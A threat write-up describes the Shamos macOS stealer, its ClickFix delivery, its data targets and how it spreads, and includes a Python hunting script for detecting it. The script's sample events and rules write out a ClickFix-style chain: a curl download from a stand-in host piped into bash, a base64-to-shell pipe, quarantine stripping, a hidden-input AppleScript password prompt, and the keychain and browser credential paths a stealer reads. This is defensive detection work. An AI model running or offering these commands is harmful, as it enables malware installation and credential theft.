Shamos Stealer
Shamos is a recently identified information stealer that targets macOS. Active since at least the summer of 2025, it is operated as a Malware-as-a-Service (MaaS) offering by the group tracked as COOKIE SPIDER. Its primary delivery vector has been ClickFix scams, a social-engineering technique increasingly used against macOS users. Shamos has been identified as a variant of the AMOS (Atomic macOS Stealer) family.
Initial Infection Pathway
Shamos primarily infiltrates systems through ClickFix scams, which trick users into copying a command from a fake support page and pasting it into Terminal. That command downloads and runs a Bash script that bypasses Gatekeeper (by clearing the quarantine attribute from the downloaded file so it is not checked), prompts for and steals the user's login password, and ultimately fetches and executes a Mach-O binary carrying Shamos. Because the victim runs the command themselves, trusting what looks like troubleshooting advice, the technique achieves a high infection rate.
Stealth and Data Harvesting
Once executed, Shamos runs anti-analysis checks to determine whether it is inside a virtual machine or sandbox. If it concludes it is on a real victim host, it begins extensive data collection, hunting for files tied to passwords, cryptocurrency wallets, and sensitive system data.
Key areas of interest include:
- Keychain: Apple's native credential store (the login keychain, managed through the Keychain Access app).
- Notes App: Often misused by users for storing private details such as passwords and recovery phrases.
- Web Browsers: A rich source of browsing history, cookies, autofill entries, stored credentials, and payment details.
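The infection chain, the anti-analysis step and the harvesting targets described above all leave traces in endpoint telemetry. The following is an added example of a small hunting script that applies two layers of rules to constructed process-launch and file-open events: command-line patterns typical of ClickFix one-liners and the dropper they pull down, and reads of credential stores by processes that are not their normal owners. It is not code from the original page or from any vendor; the indicator strings (base64-to-shell pipes, `xattr` quarantine stripping, `osascript` hidden-answer prompts, `system_profiler` hardware enumeration) and the file paths are generic to AMOS-style macOS stealers and are assumptions, not indicators published for Shamos here. The sample events, the user name `alice`, the host `example.invalid` and the process name `update` are all constructed.

```python
"""Hunt for ClickFix-style macOS stealer activity in endpoint telemetry.

Added example (not code from the original page or from any vendor report).
The indicator strings below are generic to AMOS-style macOS droppers and
stealers and are assumptions, not indicators published for Shamos here.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str     # "exec" (process launch) or "file_open"
    process: str  # image name of the process that did it
    detail: str   # command line for exec, absolute path for file_open


# Command-line patterns seen in ClickFix one-liners and the dropper scripts
# they pull down (assumed, generic to this malware class).
EXEC_RULES = {
    "base64-decoded command piped into a shell":
        re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba)?sh\b"),
    "remote download piped straight into a shell":
        re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "quarantine attribute stripped (Gatekeeper bypass)":
        re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
    "AppleScript password prompt with hidden input":
        re.compile(r"osascript.*display dialog.*hidden answer", re.IGNORECASE),
    "hardware enumeration often used as a VM check (low confidence alone)":
        re.compile(r"\bsystem_profiler\s+SPHardwareDataType\b"),
}

# Files a stealer reads to harvest credentials, notes and browser data.
# "~" is any user's home directory, "*" a single path component.
FILE_RULES = {
    "login keychain": "~/Library/Keychains/login.keychain-db",
    "Notes database": "~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite",
    "Chrome saved logins": "~/Library/Application Support/Google/Chrome/*/Login Data",
    "Chrome cookies": "~/Library/Application Support/Google/Chrome/*/Cookies",
    "Firefox saved logins": "~/Library/Application Support/Firefox/Profiles/*/logins.json",
}

# Processes expected to touch each file; anything else reading it is suspect.
FILE_OWNERS = {
    "login keychain": {"securityd", "Keychain Access"},
    "Notes database": {"Notes"},
    "Chrome saved logins": {"Google Chrome"},
    "Chrome cookies": {"Google Chrome"},
    "Firefox saved logins": {"firefox"},
}


def path_pattern(glob):
    """Turn the simple ~/* notation above into an anchored regex."""
    out = []
    for ch in glob:
        if ch == "~":
            out.append(r"/Users/[^/]+")
        elif ch == "*":
            out.append(r"[^/]+")
        else:
            out.append(re.escape(ch))
    return re.compile("^" + "".join(out) + "$")


FILE_PATTERNS = {name: path_pattern(g) for name, g in FILE_RULES.items()}


def hunt(events):
    """Return (rule, process, detail) for every event that trips a rule."""
    findings = []
    for ev in events:
        if ev.kind == "exec":
            for rule, rx in EXEC_RULES.items():
                if rx.search(ev.detail):
                    findings.append((rule, ev.process, ev.detail))
        elif ev.kind == "file_open":
            for rule, rx in FILE_PATTERNS.items():
                if rx.match(ev.detail) and ev.process not in FILE_OWNERS[rule]:
                    findings.append((rule, ev.process, ev.detail))
    return findings


# Constructed telemetry for one host: an infection chain mixed with benign
# activity (the base64 blob decodes to "hello", not a real dropper).
SAMPLE_EVENTS = [
    Event("exec", "Terminal", "echo 'aGVsbG8K' | base64 -d | bash"),
    Event("exec", "bash", "curl -fsSL https://example.invalid/update | bash"),
    Event("exec", "bash", "osascript -e 'display dialog \"Enter your password\" "
                          "default answer \"\" with hidden answer'"),
    Event("exec", "bash", "xattr -c /tmp/update"),
    Event("exec", "update", "system_profiler SPHardwareDataType"),
    Event("file_open", "update", "/Users/alice/Library/Keychains/login.keychain-db"),
    Event("file_open", "update",
          "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"),
    # Benign: owning apps reading their own stores, and a normal install.
    Event("file_open", "Google Chrome",
          "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"),
    Event("file_open", "Notes",
          "/Users/alice/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"),
    Event("exec", "Terminal", "brew install --cask iterm2"),
]

if __name__ == "__main__":
    for rule, proc, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {proc}: {detail}")
```

On the constructed events the script flags the five stages of the chain (decode-to-shell, fetch-to-shell, password prompt, quarantine stripping, hardware enumeration) and the two credential-store reads by the unknown `update` process, while ignoring Chrome and Notes reading their own databases and a Homebrew install. In production the rules belong in an EDR or an Endpoint Security Framework consumer rather than a script, the owner allowlist needs tuning per fleet (password managers and backup agents legitimately read some of these files), and `xattr -c` and `system_profiler` are also run by developers, so they are best treated as correlation signals alongside the shell-pipe and `osascript` hits rather than as alerts on their own.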
Expanding Beyond Data Theft
Shamos is not limited to credential harvesting. It has been observed downloading additional payloads, including:
- A botnet module that enrolls the infected Mac in attacker-controlled infrastructure.
- A fake Ledger Live wallet app, designed to trick cryptocurrency users.
Such capabilities make Shamos a gateway to broader infections, including ransomware, trojans, cryptominers, and other high-impact threats.
Geographic Targeting and Exclusions
Campaigns distributing Shamos have mainly targeted users in the United States, United Kingdom, Canada, China, Colombia, Italy, Japan, and Mexico. One notable exclusion is Russia, which aligns with the common practice of Russian-based MaaS operators avoiding local targets.
ClickFix Scams in Action
Shamos campaigns rely on malvertising and SEO poisoning to drive victims to fraudulent websites posing as legitimate Mac support pages. These sites use authentic-looking branding to build trust before instructing users to run the malicious command.
Additionally, cybercriminals have used deceptive GitHub repositories, offering free downloads for popular Mac tools such as iTerm2, CAD software, video editors, AI tools, and optimization programs.
Other Possible Distribution Methods
While ClickFix scams remain the primary delivery mechanism, Shamos could also be spread through more traditional malware distribution techniques, including:
Phishing and Social Engineering: Malicious links or attachments delivered via email, instant messaging, or social-media direct messages.
Drive-By Downloads and Malvertising: Hidden payloads on compromised or malicious sites.
Suspicious Distribution Channels: Pirated software, cracks, third-party freeware, and P2P networks.
Fake Updates: Deceptive prompts urging users to install fake security or system updates.
Self-Proliferation: Some malware variants spread autonomously through local networks or external drives.
The Bottom Line
The presence of Shamos on a system can lead to severe privacy intrusions, identity theft, financial losses, and multiple infections through chained attacks. Its MaaS model ensures it will remain accessible to even low-skilled threat actors, making it a persistent danger to macOS users worldwide.